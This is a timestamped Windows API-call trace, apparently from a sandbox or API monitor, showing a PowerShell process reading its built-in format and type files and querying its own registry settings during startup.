	[0566.818] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.818] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.819] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0566.819] ReadFile (in: hFile=0x330, lpBuffer=0x2e71b08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2e71b08*, lpNumberOfBytesRead=0xcd3c8*=0x0, lpOverlapped=0x0) returned 1
	[0566.819] CloseHandle (hObject=0x330) returned 1
	[0566.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0566.819] SetErrorMode (uMode=0x1) returned 0x1
	[0566.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0566.819] SetErrorMode (uMode=0x1) returned 0x1
	[0566.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0566.820] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x330) returned 0x0
	[0566.820] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0566.820] CoTaskMemAlloc (cb=0x5a) returned 0x1b963450
	[0566.820] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b963450, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0566.820] CoTaskMemFree (pv=0x1b963450) 
	[0566.820] RegCloseKey (hKey=0x330) returned 0x0
	[0566.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0566.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0572.803] VirtualQuery (in: lpAddress=0xcc110, lpBuffer=0xccfd0, dwLength=0x30 | out: lpBuffer=0xccfd0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0574.414] VirtualQuery (in: lpAddress=0xcc110, lpBuffer=0xccfd0, dwLength=0x30 | out: lpBuffer=0xccfd0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0577.329] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0577.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.329] CoTaskMemFree (pv=0x291700) 
	[0577.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x330) returned 0x0
	[0577.351] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd5dc, lpData=0x0, lpcbData=0xcd5d8*=0x0 | out: lpType=0xcd5dc*=0x1, lpData=0x0, lpcbData=0xcd5d8*=0x74) returned 0x0
	[0577.351] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd54c, lpData=0x0, lpcbData=0xcd548*=0x0 | out: lpType=0xcd54c*=0x1, lpData=0x0, lpcbData=0xcd548*=0x74) returned 0x0
	[0577.351] CoTaskMemAlloc (cb=0x78) returned 0x2d0140
	[0577.351] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd51c, lpData=0x2d0140, lpcbData=0xcd518*=0x74 | out: lpType=0xcd51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd518*=0x74) returned 0x0
	[0577.351] CoTaskMemFree (pv=0x2d0140) 
	[0577.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0577.352] SetErrorMode (uMode=0x1) returned 0x1
	[0577.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd4a0 | out: lpFileInformation=0xcd4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0577.352] SetErrorMode (uMode=0x1) returned 0x1
	[0577.353] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0577.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.353] CoTaskMemFree (pv=0x291700) 
	[0577.357] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0577.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.357] CoTaskMemFree (pv=0x291700) 
	[0577.358] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0577.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.358] CoTaskMemFree (pv=0x291700) 
	[0577.358] CoTaskMemAlloc (cb=0x104) returned 0x291700
	[0577.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.358] CoTaskMemFree (pv=0x291700) 
	[0577.358] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0577.359] GetFileType (hFile=0x308) returned 0x1
	[0577.359] SetErrorMode (uMode=0x1) returned 0x1
	[0577.359] GetFileType (hFile=0x308) returned 0x1
	[0579.231] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.232] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.233] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.233] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.234] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.234] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.234] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x9e2, lpOverlapped=0x0) returned 1
	[0579.234] ReadFile (in: hFile=0x308, lpBuffer=0x351919a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x351919a*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0579.234] ReadFile (in: hFile=0x308, lpBuffer=0x3519c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3519c50*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0579.235] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x308) returned 0x0
	[0579.235] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0579.235] CoTaskMemAlloc (cb=0x5a) returned 0x1b963530
	[0579.235] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x1b963530, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0579.235] CoTaskMemFree (pv=0x1b963530) 
	[0579.235] RegCloseKey (hKey=0x308) returned 0x0
	[0579.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0579.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0579.242] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x8482d465, Data2=0x8a82, Data3=0x4532, Data4=([0]=0xb2, [1]=0x26, [2]=0xdf, [3]=0x7a, [4]=0xce, [5]=0x45, [6]=0xda, [7]=0xde))) returned 0x0
	[0579.258] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xbfe2cc2d, Data2=0x25e3, Data3=0x4d2e, Data4=([0]=0xb9, [1]=0x39, [2]=0x65, [3]=0xe6, [4]=0xc4, [5]=0x36, [6]=0x1a, [7]=0xbd))) returned 0x0
	[0579.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0579.261] SetErrorMode (uMode=0x1) returned 0x1
	[0579.261] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0579.261] GetFileType (hFile=0x308) returned 0x1
	[0579.261] SetErrorMode (uMode=0x1) returned 0x1
	[0579.261] GetFileType (hFile=0x308) returned 0x1
	[0579.261] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.262] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.262] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.263] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.263] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.265] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0xfb2, lpOverlapped=0x0) returned 1
	[0579.265] ReadFile (in: hFile=0x308, lpBuffer=0x3543ed2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3543ed2*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0579.265] ReadFile (in: hFile=0x308, lpBuffer=0x35447b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35447b8*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0579.265] CloseHandle (hObject=0x308) returned 1
	[0579.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0579.266] SetErrorMode (uMode=0x1) returned 0x1
	[0579.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0579.266] SetErrorMode (uMode=0x1) returned 0x1
	[0579.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0579.266] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x308) returned 0x0
	[0579.266] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0579.266] CoTaskMemAlloc (cb=0x5a) returned 0x1b963530
	[0579.266] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x1b963530, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0579.266] CoTaskMemFree (pv=0x1b963530) 
	[0579.266] RegCloseKey (hKey=0x308) returned 0x0
	[0579.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0579.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0579.270] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xbf5e2507, Data2=0x57e0, Data3=0x4be4, Data4=([0]=0xa7, [1]=0x38, [2]=0xeb, [3]=0x70, [4]=0x45, [5]=0xee, [6]=0xb4, [7]=0xeb))) returned 0x0
	[0579.272] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xbb73b437, Data2=0x86d3, Data3=0x43fe, Data4=([0]=0x92, [1]=0x40, [2]=0x77, [3]=0x4, [4]=0x74, [5]=0x48, [6]=0x33, [7]=0xc0))) returned 0x0
	[0579.273] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x8dab2929, Data2=0xf773, Data3=0x4ce7, Data4=([0]=0xaa, [1]=0xd1, [2]=0x62, [3]=0x47, [4]=0xef, [5]=0x3, [6]=0x49, [7]=0x70))) returned 0x0
	[0579.273] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x1d42e182, Data2=0xbe2b, Data3=0x4cc1, Data4=([0]=0xb9, [1]=0xb5, [2]=0xdf, [3]=0xf, [4]=0x36, [5]=0xf4, [6]=0x7e, [7]=0x19))) returned 0x0
	[0579.273] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xfad7cd49, Data2=0xa786, Data3=0x4f2d, Data4=([0]=0x85, [1]=0x4e, [2]=0xd3, [3]=0xa9, [4]=0x80, [5]=0x24, [6]=0x8b, [7]=0x20))) returned 0x0
	[0579.274] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x628c863, Data2=0xf429, Data3=0x4504, Data4=([0]=0x92, [1]=0xa0, [2]=0xa2, [3]=0x46, [4]=0xf0, [5]=0x90, [6]=0x30, [7]=0x3c))) returned 0x0
	[0579.274] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0579.274] GetFileType (hFile=0x308) returned 0x1
	[0579.274] SetErrorMode (uMode=0x1) returned 0x1
	[0579.274] GetFileType (hFile=0x308) returned 0x1
	[0579.274] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0579.275] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0580.941] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0580.942] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0580.944] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0580.944] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0580.944] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0xaca, lpOverlapped=0x0) returned 1
	[0580.944] ReadFile (in: hFile=0x308, lpBuffer=0x358fb4a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x358fb4a*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0580.944] ReadFile (in: hFile=0x308, lpBuffer=0x3590518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3590518*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0580.944] CloseHandle (hObject=0x308) returned 1
	[0580.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0580.945] SetErrorMode (uMode=0x1) returned 0x1
	[0580.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0580.945] SetErrorMode (uMode=0x1) returned 0x1
	[0580.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0580.946] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x308) returned 0x0
	[0580.946] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0580.946] CoTaskMemAlloc (cb=0x5a) returned 0x1b963530
	[0580.946] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x1b963530, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0580.946] CoTaskMemFree (pv=0x1b963530) 
	[0580.946] RegCloseKey (hKey=0x308) returned 0x0
	[0580.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0580.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
